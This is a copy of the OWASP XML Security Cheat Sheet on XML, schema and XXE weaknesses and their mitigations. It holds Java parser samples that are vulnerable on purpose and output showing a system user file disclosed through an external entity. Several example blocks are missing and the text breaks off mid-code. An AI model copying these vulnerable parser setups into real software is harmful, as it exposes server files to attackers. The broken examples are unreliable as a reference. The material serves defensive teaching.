9/23/22, 9:00 AM XML Security - OWASP Cheat Sheet Series
XML Security Cheat Sheet
Introduction
Specifications for XML and XML schemas include multiple security flaws. At the same time, these
specifications provide the tools required to protect XML applications. Even though we use XML
schemas to define the security of XML documents, they can be used to perform a variety of
attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet
exposes how to exploit the different possibilities in libraries and software, divided in two sections:
+ Malformed XML Documents: vulnerabilities using not well formed documents.
+ Invalid XML Documents: vulnerabilities using documents that do not have the expected
structure.
Malformed XML Documents
The W3C XML specification defines a set of principles that XML documents must follow to be
considered well formed. When a document violates any of these principles, it must be considered a
fatal error and the data it contains is considered malformed. Multiple tactics will cause a
malformed document: removing an ending tag, rearranging the order of elements into a
nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop
execution as soon as it detects a fatal error. The document should not undergo any additional
processing, and the application should display an error message.
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C
specifications and does not take significant additional time to process malformed documents. In
addition, use only well-formed documents and validate the contents of each element and attribute
to process only valid values within predefined boundaries.
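The recommendation above can be illustrated with a minimal Java sketch that refuses any document the parser reports as not well formed. The class name WellFormedCheck and the method isWellFormed are hypothetical names chosen for this example; the sketch assumes the JAXP parser bundled with the JDK, which recognizes the Apache disallow-doctype-decl feature.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;

// Hypothetical helper: accepts a document only if parsing raises no error.
public class WellFormedCheck {

    public static boolean isWellFormed(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // Assumption: the bundled parser supports this feature; DOCTYPEs are rejected.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            DocumentBuilder builder = factory.newDocumentBuilder();
            // Stop at the first error or fatal error instead of attempting recovery.
            builder.setErrorHandler(new ErrorHandler() {
                public void warning(SAXParseException e) { }
                public void error(SAXParseException e) throws SAXException { throw e; }
                public void fatalError(SAXParseException e) throws SAXException { throw e; }
            });
            builder.parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (Exception e) {
            // No further processing of the document takes place.
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(isWellFormed("<a><b/></a>"));
        System.out.println(isWellFormed("<a><b></a>")); // missing ending tag for b
    }
}
```

Returning a boolean keeps the caller from touching a partially parsed tree; a real application would also log the error and report a generic message to the user.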
More Time Required
A malformed document may affect the consumption of Central Processing Unit (CPU) resources.
In certain scenarios, the amount of time required to process malformed documents may be greater
than that required for well-formed documents. When this happens, an attacker may exploit an
asymmetric resource consumption attack to take advantage of the greater processing time to
cause a Denial of Service (DoS).
To assess the likelihood of this attack, compare the time taken by a regular XML document with the
time taken by a malformed version of that same document. Then, consider how an attacker could
use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify
the effect.
Applications Processing Malformed Data
Certain XML parsers have the ability to recover malformed documents. They can be instructed to
try their best to return a valid tree with all the content that they can manage to parse, regardless of
the document's noncompliance with the specifications. Since there are no predefined rules for the
recovery process, the approach and results may not always be the same. Using malformed
documents might lead to unexpected issues related to data integrity.
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:
Malformed Document to Malformed Document
According to the XML specification, the string -- (double-hyphen) must not occur within
comments. Using the recovery mode of lxml and PHP, the following document will remain the
same after being recovered:
Well-Formed Document to Well-Formed Document Normalized
Certain parsers may consider normalizing the contents of your CDATA sections. This means that
they will update the special characters contained in the CDATA section to contain the safe versions
of these characters even though it is not required:
<![CDATA[<script>a=1;</script>]]>
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform
this document to its canonical version, but although well formed, its contents may be considered
malformed depending on the situation:
&lt;script&gt;a=1;&lt;/script&gt;
Coercive Parsing
A coercive attack in XML involves parsing deeply nested XML documents without their
corresponding ending tags. The idea is to make the victim use up (and eventually deplete) the
machine's resources and cause a denial of service on the target. Reports of a DoS attack in Firefox
3.67 included the use of 30,000 open XML elements without their corresponding ending tags.
Removing the closing tags simplified the attack since it requires only half of the size of a
well-formed document to accomplish the same results. The number of tags being processed eventually
caused a stack overflow. A simplified version of such a document would look like this:
Violation of XML Specification Rules
Unexpected consequences may result from manipulating documents using parsers that do not
follow W3C specifications. It may be possible to achieve crashes and/or code execution when the
software does not properly verify how to handle incorrect XML structures. Feeding the software
with fuzzed XML documents may expose this behavior.
Invalid XML Documents
Attackers may introduce unexpected values in documents to take advantage of an application that
does not verify whether the document contains a valid set of values. Schemas specify restrictions
that help identify whether documents are valid. A valid document is well formed and complies with
the restrictions of a schema, and more than one schema can be used to validate a document.
These restrictions may appear in multiple files, either using a single schema language or relying on
the strengths of the different schema languages.
The recommendation to avoid these vulnerabilities is that each XML document must have a
precisely defined XML Schema (not DTD) with every piece of information properly restricted to
avoid problems of improper data validation. Use a local copy or a known good repository instead of
the schema reference supplied in the XML document. Also, perform an integrity check of the XML
schema file being referenced, bearing in mind the possibility that the repository could be
compromised. In cases where the XML documents are using remote schemas, configure servers to
use only secure, encrypted communications to prevent attackers from eavesdropping on network
traffic.
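One way to perform the integrity check mentioned above is to pin a cryptographic digest of the known good schema and compare it before every use. The following Java sketch assumes SHA-256 as the digest; the class SchemaIntegrity and its method names are hypothetical, and how the pinned value is stored and distributed is left to the application.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical helper: compares a schema's SHA-256 digest with a pinned value.
public class SchemaIntegrity {

    // Returns the lowercase hexadecimal SHA-256 digest of the given bytes.
    public static String sha256Hex(byte[] data) {
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            StringBuilder hex = new StringBuilder();
            for (byte b : md.digest(data)) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            // SHA-256 is required to be available on every Java platform.
            throw new IllegalStateException(e);
        }
    }

    // True only if the schema bytes hash to the pinned digest.
    public static boolean matchesPinnedDigest(byte[] schemaBytes, String pinnedHex) {
        byte[] actual = sha256Hex(schemaBytes).getBytes(StandardCharsets.US_ASCII);
        byte[] expected = pinnedHex.toLowerCase().getBytes(StandardCharsets.US_ASCII);
        return MessageDigest.isEqual(actual, expected);
    }

    public static void main(String[] args) {
        byte[] trusted = "<!ELEMENT note (#PCDATA)>".getBytes(StandardCharsets.UTF_8);
        String pinned = sha256Hex(trusted); // recorded once from the known good copy
        byte[] tampered = "<!ELEMENT note ANY>".getBytes(StandardCharsets.UTF_8);
        System.out.println(matchesPinnedDigest(trusted, pinned));
        System.out.println(matchesPinnedDigest(tampered, pinned));
    }
}
```

The check only helps if the pinned digest is kept somewhere an attacker who can modify the schema cannot also modify.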
Document without Schema
Consider a bookseller that uses a web service through a web interface to make transactions. The
XML document for transactions is composed of two elements: an id value related to an item and
a certain price. The user may only introduce a certain id value using the web interface:
<buy>
<id>123</id>
<price>10</price>
</buy>
If there is no control on the document's structure, the application could also process different
well-formed messages with unintended consequences. The previous document could have contained
additional tags to affect the behavior of the underlying application processing its contents:
<buy>
<id>123</id><price>0</price><id></id>
<price>10</price>
</buy>
Notice again how the value 123 is supplied as an id, but now the document includes additional
opening and closing tags. The attacker closed the id element and set a bogus price element to
the value 0. The final step to keep the structure well-formed is to add one empty id element. After
this, the application adds the closing tag for id and sets the price to 10. If the application
processes only the first values provided for the id and the price without performing any type of
control on the structure, it could benefit the attacker by providing the ability to buy a book without
actually paying for it.
Unrestrictive Schema
Certain schemas do not offer enough restrictions for the type of data that each element can
receive. This is what normally happens when using DTD; it has a very limited set of possibilities
compared to the type of restrictions that can be applied in XML documents. This could expose the
application to undesired values within elements or attributes that would be easy to constrain when
using other schema languages. In the following example, a person's age is validated against an
inline DTD schema:
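<!DOCTYPE person [
<!ELEMENT person (name, age)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
]>
<person>
<name>John Doe</name>
<age>11111..(1.000.000 digits)..11111</age>
</person>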
The previous document contains an inline DTD with a root element named person. This element
contains two elements in a specific order: name and then age. The element name is then defined
to contain PCDATA, as well as the element age. After this definition begins the well-formed and
valid XML document. The element name contains an irrelevant value but the age element contains
one million digits. Since there are no restrictions on the maximum size for the age element, this
one-million-digit string could be sent to the server for this element. Typically this type of element
should be restricted to contain no more than a certain amount of characters and constrained to a
certain set of characters (for example, digits from 0 to 9, the + sign and the - sign). If not properly
restricted, applications may handle potentially invalid values contained in documents. Since it is
not possible to indicate specific restrictions (a maximum length for the element name or a valid
range for the element age), this type of schema increases the risk of affecting the integrity and
availability of resources.
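For contrast, the same person document can be constrained with an XML Schema. The following Java sketch validates against an inline XSD; the limits chosen here (a name of at most 100 characters and an age of at most 150) are illustrative assumptions, not values from the original example, and PersonValidator is a hypothetical class name. It assumes the JAXP validation implementation bundled with the JDK.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

// Hypothetical validator: restricts name length and age range with XSD facets.
public class PersonValidator {

    // Assumed limits for illustration: name <= 100 characters, age between 0 and 150.
    private static final String XSD =
          "<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'>"
        + "<xs:element name='person'><xs:complexType><xs:sequence>"
        + "<xs:element name='name'><xs:simpleType>"
        + "<xs:restriction base='xs:string'><xs:maxLength value='100'/></xs:restriction>"
        + "</xs:simpleType></xs:element>"
        + "<xs:element name='age'><xs:simpleType>"
        + "<xs:restriction base='xs:nonNegativeInteger'><xs:maxInclusive value='150'/></xs:restriction>"
        + "</xs:simpleType></xs:element>"
        + "</xs:sequence></xs:complexType></xs:element></xs:schema>";

    public static boolean isValid(String xml) {
        try {
            SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            Schema schema = sf.newSchema(new StreamSource(new StringReader(XSD)));
            Validator validator = schema.newValidator();
            // Do not fetch external DTDs or schemas referenced by the instance document.
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
            validator.validate(new StreamSource(new StringReader(xml)));
            return true;
        } catch (Exception e) {
            // Any validation or parsing error means the document is rejected.
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(isValid("<person><name>John Doe</name><age>42</age></person>"));
        System.out.println(isValid("<person><name>John Doe</name><age>11111111111111111111</age></person>"));
    }
}
```

With these facets the schema itself rejects an oversized age, so the application code never has to handle the value.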
Improper Data Validation
When schemas are insecurely defined and do not provide strict rules, they may expose the
application to diverse situations. The result of this could be the disclosure of internal errors or
documents that hit the application's functionality with unexpected values.
String Data Types
If you need to use a hexadecimal value, there is no point in defining this value as a string
that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario,
when using XML encryption some values must be encoded using base64. This is the schema
definition of how these values should look:
The previous schema defines the element CipherValue as a base64 data type. As an example, the
IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after
a valid base64 value, and considered it valid. The first portion of this data is properly checked as a
base64 value, but the remaining characters could be anything else (including other sub-elements of
the CipherData element). Restrictions are partially set for the element, which means that the
information is probably tested using an application instead of the proposed sample schema.
Numeric Data Types
Defining the correct data type for numbers can be more complex since there are more options than
there are for strings.
NEGATIVE AND POSITIVE RESTRICTIONS
XML Schema numeric data types can include different ranges of numbers. They could include:
+ negativeInteger: Only negative numbers
+ nonNegativeInteger: Positive numbers and the zero value
+ positiveInteger: Only positive numbers
+ nonPositiveInteger: Negative numbers and the zero value
The following sample document defines an id for a product, a price, and a quantity value that
is under the control of an attacker:
<buy>
<id>1</id>
<price>10</price>
<quantity>1</quantity>
</buy>
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect
structure in cases where an attacker wants to introduce additional elements:
<xs:element name="id" type="xs:integer"/>
<xs:element name="price" type="xs:decimal"/>
<xs:element name="quantity" type="xs:integer"/>
Limiting that quantity to an integer data type will avoid any unexpected characters. Once the
application receives the previous message, it may calculate the final price by doing
price*quantity. However, since this data type may allow negative values, it might allow a
negative result on the user's account if an attacker provides a negative number. What you probably
want to see in here to avoid that logical vulnerability is positiveInteger instead of integer.
DIVIDE BY ZERO
Whenever using user controlled values as denominators in a division, developers should avoid
allowing the number zero. In cases where the value zero is used for division in XSLT, the error
FOAR0001 will occur. Other applications may throw other exceptions and the program may crash.
There are specific data types for XML schemas that specifically avoid using the zero value. For
example, in cases where negative values and zero are not considered valid, the schema could
specify the data type positiveInteger for the element:
The element denominator is now restricted to positive integers. This means that only values
greater than zero will be considered valid. If you see any other type of restriction being used, you
may trigger an error if the denominator is zero.
SPECIAL VALUES: INFINITY AND NOT A NUMBER (NAN)
The data types float and double contain real numbers and some special values: -Infinity or
-INF, NaN, and +Infinity or INF. These possibilities may be useful to express certain values,
but they are sometimes misused. The problem is that they are commonly used to express only real
numbers such as prices. This is a common error seen in other programming languages, not solely
restricted to these technologies. Not considering the whole spectrum of possible values for a data
type could make underlying applications fail. If the special values Infinity and NaN are not
required and only real numbers are expected, the data type decimal is recommended:
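<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="buy">
<xs:complexType>
<xs:sequence>
<xs:element name="id" type="xs:integer"/>
<xs:element name="price" type="xs:decimal"/>
<xs:element name="quantity" type="xs:positiveInteger"/>
</xs:sequence>
</xs:complexType>
</xs:element>
</xs:schema>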
The price value will not trigger any errors when set at Infinity or NaN, because these values will not
be valid. An attacker can exploit this issue if those values are allowed.
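The difference between the two data types can be observed directly. The following Java sketch validates a single price element against a one-element schema whose type is passed in; PriceTypeCheck and accepts are hypothetical names, and the sketch assumes the XSD 1.0 validator bundled with the JDK, where the lexical forms of the special values are INF, -INF, and NaN.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;

// Hypothetical helper: checks whether a value is valid for a given XSD simple type.
public class PriceTypeCheck {

    // Both arguments are trusted literals in this sketch; they are not escaped.
    public static boolean accepts(String xsdType, String value) {
        String xsd = "<xs:schema xmlns:xs='http://www.w3.org/2001/XMLSchema'>"
                   + "<xs:element name='price' type='" + xsdType + "'/></xs:schema>";
        try {
            SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
            Validator validator =
                sf.newSchema(new StreamSource(new StringReader(xsd))).newValidator();
            validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            validator.validate(
                new StreamSource(new StringReader("<price>" + value + "</price>")));
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) {
        // xs:double admits the special values; xs:decimal does not.
        System.out.println("double/INF:  " + accepts("xs:double", "INF"));
        System.out.println("double/NaN:  " + accepts("xs:double", "NaN"));
        System.out.println("decimal/INF: " + accepts("xs:decimal", "INF"));
        System.out.println("decimal/NaN: " + accepts("xs:decimal", "NaN"));
    }
}
```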
General Data Restrictions
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes
only a certain subset of values within a data type will be considered valid.
PREFIXED VALUES
Certain types of values should be restricted to specific sets: traffic lights will have only three
types of colors, only 12 months are available, and so on. It is possible that the schema has these
restrictions in place for each element or attribute. This is the ideal allow-list scenario for an
application: only specific values will be accepted. Such a constraint is called enumeration in XML
schema. The following example restricts the contents of the element month to 12 possible values:
<xs:enumeration value="January"/>
<xs:enumeration value="February"/>
<xs:enumeration value="March"/>
<xs:enumeration value="April"/>
<xs:enumeration value="May"/>
<xs:enumeration value="June"/>
<xs:enumeration value="July"/>
<xs:enumeration value="August"/>
<xs:enumeration value="September"/>
<xs:enumeration value="October"/>
<xs:enumeration value="November"/>
<xs:enumeration value="December"/>
By limiting the month element's value to any of the previous values, the application will not be
manipulating random strings.
RANGES
Software applications, databases, and programming languages normally store information within
specific ranges. Whenever using an element or an attribute in locations where certain specific
sizes matter (to avoid overflows or underflows), it would be logical to check whether the data
length is considered valid. The following schema could constrain a name using a minimum and a
maximum length to avoid unusual scenarios:
In cases where the possible values are restricted to a certain specific length (let's say 8), this value
can be specified as follows to be valid:
PATTERNS
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions
when using XML schemas. When you want to ensure that the data complies with a specific pattern,
you can create a specific definition for it. Social security numbers (SSN) may serve as a good
example; they must use a specific set of characters, a specific length, and a specific pattern:
Only numbers between 000-00-0000 and 999-99-9999 will be allowed as values for SSN.
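The same constraint can also be enforced in application code as a second line of defense. The following Java sketch assumes the three-two-four digit layout described above; the class SsnPattern and the method isValidSsn are hypothetical names, and the regular expression is this example's rendering of the pattern rather than the schema's own definition.

```java
import java.util.regex.Pattern;

// Hypothetical helper: checks the SSN layout of three, two, and four digits.
public class SsnPattern {

    // Assumed pattern: digits only, separated by hyphens, fixed length.
    private static final Pattern SSN = Pattern.compile("[0-9]{3}-[0-9]{2}-[0-9]{4}");

    public static boolean isValidSsn(String value) {
        // matches() requires the whole string to fit the pattern,
        // which mirrors the implicit anchoring of XSD pattern facets.
        return value != null && SSN.matcher(value).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValidSsn("123-45-6789"));
        System.out.println(isValidSsn("123-45-6789<script>"));
    }
}
```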
ASSERTIONS
Assertion components constrain the existence and values of related elements and attributes on
XML schemas. An element or attribute will be considered valid with regard to an assertion only if
the test evaluates to true without raising any error. The variable $value can be used to reference
the contents of the value being analyzed. The Divide by Zero section above referenced the potential
consequences of using data types containing the zero value for denominators, proposing a data
type containing only positive values. An opposite example would consider valid the entire range of
numbers except zero. To avoid disclosing potential errors, values could be checked using an
assertion disallowing the number zero:
The assertion guarantees that the denominator will not contain the value zero as a valid number
and also allows negative numbers to be a valid denominator.
OCCURRENCES
The consequences of not defining a maximum number of occurrences could be worse than coping
with the consequences of what may happen when receiving extreme numbers of items to be
processed. Two attributes specify minimum and maximum limits: minOccurs and maxOccurs.
The default value for both the minOccurs and the maxOccurs attributes is 1, but certain elements
may require other values. For instance, if a value is optional, it could contain a minOccurs of 0, and
if there is no limit on the maximum amount, it could contain a maxOccurs of unbounded, as in the
following example:
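<xs:element name="buy" maxOccurs="unbounded">
<xs:element name="id" type="xs:integer"/>
<xs:element name="price" type="xs:decimal"/>
<xs:element name="quantity" type="xs:integer"/>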
The previous schema includes a root element named operation, which can contain an unlimited
(unbounded) amount of buy elements. This is a common finding, since developers do not normally
want to restrict maximum numbers of occurrences. Applications using limitless occurrences
should test what happens when they receive an extremely large amount of elements to be
processed. Since computational resources are limited, the consequences should be analyzed and
eventually a maximum number ought to be used instead of an unbounded value.
Jumbo Payloads
Sending an XML document of 1GB requires only a second of server processing and might not be
worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU
and traffic used to generate this type of attack, compared to the overall amount of server CPU or
traffic used to handle the requests.
Traditional Jumbo Payloads
There are two primary methods to make a document larger than normal:
+ Depth attack: using a huge number of elements, element names, and/or element values.
+ Width attack: using a huge number of attributes, attribute names, and/or attribute values.
In most cases, the overall result will be a huge document. This is a short example of what this
looks like:
"Small" Jumbo Payloads
The following example is a very small document, but the results of processing this could be similar
to those of processing traditional jumbo payloads. The purpose of such a small payload is that it
allows an attacker to send many documents fast enough to make the application consume most or
all of the available resources:
<?xml version="1.0"?>
]>
Schema Poisoning
When an attacker is capable of introducing modifications to a schema, there could be multiple
high-risk consequences. In particular, the effect of these consequences will be more dangerous if
the schemas are using DTD (e.g. file retrieval, denial of service). An attacker could exploit this type
of vulnerability in numerous scenarios, always depending on the location of the schema.
Local Schema Poisoning
Local schema poisoning happens when schemas are available in the same host, whether or not the
schemas are embedded in the same XML document.
EMBEDDED SCHEMA
The most trivial type of schema poisoning takes place when the schema is defined within the same
XML document. Consider the following, unknowingly vulnerable example provided by the W3C:
<?xml version="1.0"?>
]>
<note>
<to>Tove</to>
<heading>Reminder</heading>
Don't forget me this weekend
All restrictions on the note element could be removed or altered, allowing the sending of any type
of data to the server. Furthermore, if the server is processing external entities, the attacker could
use the schema, for example, to read remote files from the server. This type of schema only serves
as a suggestion for sending a document, but it must contain a way to check the embedded schema
integrity to be used safely. Attacks through embedded schemas are commonly used to exploit
external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts
or brute force attacks.
INCORRECT PERMISSIONS
You can often circumvent the risk of using remotely tampered versions by processing a local
schema:
Tove
Reminder
However, if the local schema does not contain the correct permissions, an internal attacker could
alter the original restrictions. The following line exemplifies a schema using permissions that allow
any user to make modifications:
-rw-rw-rw- 1 user staff 743 Jan 18 12:32 note.dtd
The permissions set on note.dtd allow any user on the system to make modifications. This
vulnerability is clearly not related to the structure of an XML document or a schema, but since these
documents are commonly stored in the filesystem, it is worth mentioning that an attacker could
exploit this type of problem.
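An application can refuse to load a local schema whose permissions are too loose. The following Java sketch assumes a POSIX file system; SchemaPermissions and its methods are hypothetical names, and treating group-writable files as unsafe is a policy choice of this example.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;

// Hypothetical helper: flags schema files writable by anyone other than the owner.
public class SchemaPermissions {

    public static boolean isWritableByGroupOrOthers(Path file) {
        try {
            Set<PosixFilePermission> perms = Files.getPosixFilePermissions(file);
            return perms.contains(PosixFilePermission.GROUP_WRITE)
                || perms.contains(PosixFilePermission.OTHERS_WRITE);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Demo only: creates a temporary file with the given permissions and checks it.
    public static boolean checkTempFile(String permissionString) {
        try {
            Path file = Files.createTempFile("note", ".dtd");
            try {
                Files.setPosixFilePermissions(
                    file, PosixFilePermissions.fromString(permissionString));
                return isWritableByGroupOrOthers(file);
            } finally {
                Files.delete(file);
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(checkTempFile("rw-rw-rw-")); // same mode as the listing above
        System.out.println(checkTempFile("rw-r--r--"));
    }
}
```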
Remote Schema Poisoning
Schemas defined by external organizations are normally referenced remotely. If capable of
diverting or accessing the network's traffic, an attacker could cause a victim to fetch a distinct type
of content rather than the one originally intended.
MAN-IN-THE-MIDDLE (MITM) ATTACK
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol
(HTTP), the communication is performed in plain text and an attacker could easily tamper with
traffic. When XML documents reference remote schemas using an HTTP connection, the
connection could be sniffed and modified before reaching the end user:
<to>Tove</to>
Jani
Reminder
Don't forget me this weekend
The remote file note.dtd could be susceptible to tampering when transmitted using the
unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.
DNS-CACHE POISONING
Remote schema poisoning may also be possible even when using encrypted protocols like
Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name
System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that
the IP address is truly associated with the hostname. In this case, the software enables an attacker
to redirect content to their own Internet Protocol (IP) addresses.
The previous example referenced the host example.com using an unencrypted protocol.
When switching to HTTPS, the location of the remote schema will look like
https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:
$ host example.com
example.com has address 1.1.1.1
If an attacker compromises the DNS being used, the previous hostname could now point to a new,
different IP controlled by the attacker, 2.2.2.2:
$ host example.com
example.com has address 2.2.2.2
When accessing the remote file, the victim may actually be retrieving the contents of a location
controlled by an attacker.
EVIL EMPLOYEE ATTACK
When third parties host and define schemas, the contents are not under the control of the
schemas' users. Any modifications introduced by a malicious employee (or an external attacker in
control of these files) could impact all users processing the schemas. Subsequently, attackers
could affect the confidentiality, integrity, or availability of other services (especially if the schema in
use is DTD).
XML Entity Expansion
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser
during document processing. These adverse effects could include the parser crashing or
accessing local files.
Sample Vulnerable Java Implementations
Using the DTD capabilities of referencing local or remote files, it is possible to affect
confidentiality. In addition, it is also possible to affect the availability of the resources if no proper
restrictions have been set for the entities expansion. Consider the following example code of an
XXE.
Sample XML:
<contact>
<firstname>John</firstname>
<lastname>&xxe;</lastname>
</contact>
Sample DTD:
XXE USING DOM
import java.io.IOException;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

public class parseDocument {
  public static void main(String[] args) {
    try {
      // Vulnerable: the factory is used with its default settings.
      DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
      DocumentBuilder builder = factory.newDocumentBuilder();
      Document doc = builder.parse(new InputSource("contacts.xml"));
      NodeList nodeList = doc.getElementsByTagName("contact");
      for (int s = 0; s < nodeList.getLength(); s++) {
        Node firstNode = nodeList.item(s);
        if (firstNode.getNodeType() == Node.ELEMENT_NODE) {
          Element firstElement = (Element) firstNode;
          NodeList firstNameElementList =
              firstElement.getElementsByTagName("firstname");
          Element firstNameElement = (Element) firstNameElementList.item(0);
          NodeList firstName = firstNameElement.getChildNodes();
          System.out.println("First Name: " + ((Node)
              firstName.item(0)).getNodeValue());
          NodeList lastNameElementList =
              firstElement.getElementsByTagName("lastname");
          Element lastNameElement = (Element) lastNameElementList.item(0);
          NodeList lastName = lastNameElement.getChildNodes();
          System.out.println("Last Name: " + ((Node)
              lastName.item(0)).getNodeValue());
        }
      }
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
The previous code produces the following output:
$ javac parseDocument.java ; java parseDocument
First Name: John
Last Name: ### User Database
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
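For comparison, the DOM parser can be configured so that a document carrying a DOCTYPE is rejected before any entity is resolved. This is a minimal sketch, assuming the JAXP implementation bundled with the JDK (which recognizes the Apache disallow-doctype-decl feature); SafeDomParser and its methods are hypothetical names, and applications that genuinely need DTDs would require a different configuration.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;

// Hypothetical hardened counterpart to the DOM example.
public class SafeDomParser {

    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Reject every document that contains a DOCTYPE declaration.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Enable the implementation's built-in processing limits.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the document parses under the hardened configuration.
    public static boolean parses(String xml) {
        try {
            DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
            builder.setErrorHandler(new ErrorHandler() {
                public void warning(SAXParseException e) { }
                public void error(SAXParseException e) throws SAXException { throw e; }
                public void fatalError(SAXParseException e) throws SAXException { throw e; }
            });
            builder.parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) {
        String xxe = "<!DOCTYPE contact [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                   + "<contact><lastname>&xxe;</lastname></contact>";
        System.out.println(parses("<contact><firstname>John</firstname></contact>"));
        System.out.println(parses(xxe)); // rejected at the DOCTYPE
    }
}
```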
XXE USING DOM4J
import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.io.SAXReader;
import org.dom4j.io.OutputFormat;
import org.dom4j.io.XMLWriter;

public class test1 {
  public static void main(String[] args) {
    Document document = null;
    try {
      // Vulnerable: the reader is used with its default settings.
      SAXReader reader = new SAXReader();
      document = reader.read("contacts.xml");
    } catch (Exception e) {
      e.printStackTrace();
    }
    OutputFormat format = OutputFormat.createPrettyPrint();
    try {
      XMLWriter writer = new XMLWriter(System.out, format);
      writer.write(document);
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
The previous code produces the following output:
$ java test1
<?xml version="1.0" encoding="UTF-8"?>
John### User Database
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
XXE USING SAX
import java.io.IOException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class parseDocument extends DefaultHandler {
  public static void main(String[] args) {
    new parseDocument();
  }

  public parseDocument() {
    try {
      // Vulnerable: the factory is used with its default settings.
      SAXParserFactory factory = SAXParserFactory.newInstance();
      SAXParser parser = factory.newSAXParser();
      parser.parse("contacts.xml", this);
    } catch (Exception e) {
      e.printStackTrace();
    }
  }

  @Override
  public void characters(char[] ac, int i, int j) throws SAXException {
    String tmpValue = new String(ac, i, j);
    System.out.println(tmpValue);
  }
}
The previous code produces the following output:
$ java parseDocument
John
### User Database
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
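The SAX parser accepts the same kind of restrictions through factory features. The sketch below is an assumption-laden counterpart to the example above: SafeSaxParser and extractText are hypothetical names, and the feature URIs are those recognized by the JDK's bundled parser.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical hardened counterpart to the SAX example.
public class SafeSaxParser {

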